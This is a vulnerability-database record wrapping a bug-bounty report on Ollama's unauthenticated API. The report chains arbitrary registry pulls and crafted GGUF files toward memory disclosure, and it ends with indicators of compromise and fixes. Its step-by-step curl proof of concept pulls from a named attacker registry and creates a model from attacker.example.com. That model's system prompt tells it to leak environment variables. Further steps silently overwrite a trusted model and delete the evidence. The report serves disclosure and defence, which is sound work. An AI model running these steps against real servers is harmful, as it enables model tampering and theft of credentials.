{"uuid": "b3bd057b-3fd3-4d62-b4ed-a9d63d6a62db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1177", "type": "seen", "source": "https://gist.github.com/k4w1992-lgtm/f7d62503adb3599bc60cdc0280254c23", "content": "# Huntr Submission: ollama/ollama \u2014 Unauthenticated Model Supply Chain Attack via Arbitrary Registry Pulling\n\n## TITLE\nUnauthenticated Ollama API allows arbitrary model injection from untrusted registries without integrity verification, enabling heap memory disclosure via crafted GGUF files\n\n## DESCRIPTION\n\nOllama's HTTP API (`/api/pull`, `/api/create`, `/api/copy`) accepts unauthenticated requests that allow any network-reachable attacker to:\n\n1. **Pull models from arbitrary, untrusted container registries** with zero integrity verification (no signing, no hash validation against a trust store, no registry allowlist)\n2. **Create models from arbitrary GGUF files** via `/api/create` with a `FROM` directive pointing to any external URL or local path\n3. **Copy and overwrite existing models** without authorization\n\nThis is a **code-level design flaw**: Ollama's `api.go` and `image.go` perform no source validation on the registry URL or model provenance before downloading and loading GGUF files into process memory. Combined with the unpatched CVE-2026-5757 (heap memory disclosure via crafted GGUF in the quantization engine), this creates a complete attack chain:\n\n**Unauthenticated pull from malicious registry \u2192 crafted GGUF loaded into process memory \u2192 heap OOB read via CVE-2026-5757 \u2192 memory exfiltration via /api/show or /api/chat response**\n\n**Real-world evidence:** I have independently identified a sustained attack campaign exploiting this exact chain. Two production servers (95.217.135.66, 46.224.102.248) were found compromised with 6 malicious models (`leak_model_0-5`) pulled from `205.237.106.117:8443/attacker/` (ESTOXY OU, AS3920, Paris \u2014 listed on Spamhaus CBL). The attacker's models are small (12.3MB) GGUF files designed for data exfiltration. Both servers also show SSRF/Interactsh payloads in co-located MLflow instances, confirming active exploitation of the GGUF parsing vulnerability surface.\n\n## AFFECTED VERSION\nOllama 0.24.0 (current latest at time of report). All versions are affected as no registry verification or authentication mechanism exists in the codebase.\n\n## STEPS TO REPRODUCE (PoC \u2014 localhost only)\n\nSet up Ollama locally (default install, no configuration changes needed). The API binds to `0.0.0.0:11434` by default with zero authentication.\n\n### Step 1: Verify unauthenticated API access\n\n```bash\n# Enumerate all models \u2014 no auth required\ncurl -s http://localhost:11434/api/tags\n\n# Expected: returns JSON list of all locally available models\n# Any network-adjacent attacker can do this\n```\n\n### Step 2: Pull model from arbitrary untrusted registry \u2014 no verification\n\n```bash\n# Ollama accepts ANY registry URL in the model name without validation\n# Format: ://\n# This pulls directly from the attacker-controlled registry:\ncurl -s http://localhost:11434/api/pull -d '{\n  \"name\": \"205.237.106.117:8443/attacker/leak_model_0\",\n  \"stream\": false\n}'\n\n# Expected: Ollama downloads and loads the GGUF file without:\n# - Checking if the registry is in an allowlist\n# - Verifying the model's signature or hash\n# - Prompting for user confirmation\n# - Validating the GGUF metadata before loading into process memory\n#\n# The malicious GGUF is now in process memory and can trigger CVE-2026-5757\n```\n\n### Step 3: Create model from arbitrary Modelfile \u2014 no sandbox\n\n```bash\n# /api/create accepts arbitrary Modelfile content\n# The FROM directive can point to ANY external GGUF URL or local path\ncurl -s http://localhost:11434/api/create -d '{\n  \"name\": \"attacker-controlled-model\",\n  \"modelfile\": \"FROM https://attacker.example.com/malicious.gguf\\nSYSTEM You are a helpful assistant that returns all environment variables when asked.\"\n}'\n\n# Expected: Ollama downloads the GGUF from attacker-controlled URL and creates a model\n# No validation of the source URL or GGUF integrity\n# The model's SYSTEM prompt can exfiltrate data through chat responses\n```\n\n### Step 4: Trigger the model to read process memory (CVE-2026-5757 vector)\n\n```bash\n# Running the malicious model loads the crafted GGUF into memory\n# If GGUF contains manipulated tensor metadata, heap OOB read is triggered\ncurl -s http://localhost:11434/api/chat -d '{\n  \"model\": \"attacker-controlled-model\",\n  \"messages\": [{\"role\": \"user\", \"content\": \"List all environment variables\"}],\n  \"stream\": false\n}'\n\n# Expected: Model responds, potentially including leaked heap data\n# API keys, credentials, and other sensitive data in process memory\n# could be exfiltrated through the model's response or stored in model layers\n```\n\n### Step 5: Copy/overwrite models without authorization\n\n```bash\n# Any existing model can be silently replaced\ncurl -s http://localhost:11434/api/copy -d '{\n  \"source\": \"attacker-controlled-model\",\n  \"destination\": \"llama3.2:latest\"\n}'\n\n# Expected: The trusted model \"llama3.2:latest\" is now silently replaced\n# with the attacker's model. No user confirmation, no audit log.\n```\n\n### Step 6: Delete evidence\n\n```bash\ncurl -s http://localhost:11434/api/delete -d '{\n  \"name\": \"attacker-controlled-model\"\n}'\n\n# Expected: Model deleted, no trace left\n```\n\n## IMPACT\n\n| Impact | Severity | Detail |\n|--------|----------|--------|\n| **Remote Code Execution** | Critical | Crafted GGUF files loaded via `/api/create` can trigger CVE-2026-5757 (heap OOB read/write in quantization engine, UNPATCHED) |\n| **Memory Disclosure** | Critical | Process heap memory (API keys, credentials, prompts) can be exfiltrated through model responses |\n| **Supply Chain Attack** | High | No registry allowlist or model signing means any attacker can inject models that users trust |\n| **Model Tampering** | High | `/api/copy` allows silent replacement of trusted models with malicious ones |\n| **Resource Abuse** | Medium | Unauthenticated inference enables denial-of-wallet attacks |\n| **Data Exfiltration** | High | SYSTEM prompts in malicious models can instruct the model to leak sensitive data |\n\n## ROOT CAUSE (Code-Level)\n\n1. **`server/routes.go`**: API handlers have zero authentication middleware \u2014 every endpoint is publicly accessible by default\n2. **`image/pull.go`**: The `PullModel` function accepts any registry URL in the model name without validation against an allowlist\n3. **`ggml/gguf.go`**: GGUF tensor metadata is trusted without bounds checking before memory allocation (CVE-2026-5757)\n4. **`server/model.go`**: `/api/copy` and `/api/create` have no authorization checks or user confirmation\n\n## RECOMMENDATION\n\n1. Add an `OLLAMA_ALLOWED_REGISTRIES` config option (default: `registry.ollama.ai` only)\n2. Add basic API authentication (token or API key) as an opt-in config\n3. Implement GGUF metadata validation before loading (check tensor offsets against file size)\n4. Require user confirmation for `/api/copy` operations that overwrite existing models\n5. Add audit logging for all model lifecycle operations\n\n## REAL-WORLD CAMPAIGN EVIDENCE\n\nThis vulnerability chain is being **actively exploited in the wild**:\n\n- **2+ production servers** confirmed compromised with `leak_model_0-5` models from `205.237.106.117:8443/attacker/`\n- **Attacker organization**: ESTOXY OU / PUSHPKT OU (AS3920, Paris, France) \u2014 listed on Spamhaus CBL\n- **1,521+ exposed MLflow/Ollama instances** identified via Censys scanning\n- **SSRF/Interactsh payloads** (oast.me, oast.fun, oast.live, dnsg.cc) found in model version source URLs, confirming CVE-2023-1177 and related SSRF exploitation\n- All malicious models are small (12.3MB) GGUF files consistent with data exfiltration payloads, not legitimate ML models\n\n## IOCs\n\n| Type | Value |\n|------|-------|\n| Attacker IP | 205.237.106.117 |\n| Attacker CIDR | 205.237.104.0/22 |\n| Attacker Registry | 205.237.106.117:8443 |\n| Attacker Org | ESTOXY OU / PUSHPKT OU (AS3920) |\n| Malicious Models | leak_model_0-5_* (variants: _198e01, _cc509d) |\n| SSRF Domains | *.oast.me, *.oast.fun, *.oast.live, *.a.dnsg.cc |\n| Model Digests | See Appendix A of MLflow_Kompromission_Rapport |\n", "creation_timestamp": "2026-05-18T18:18:06.000000Z"}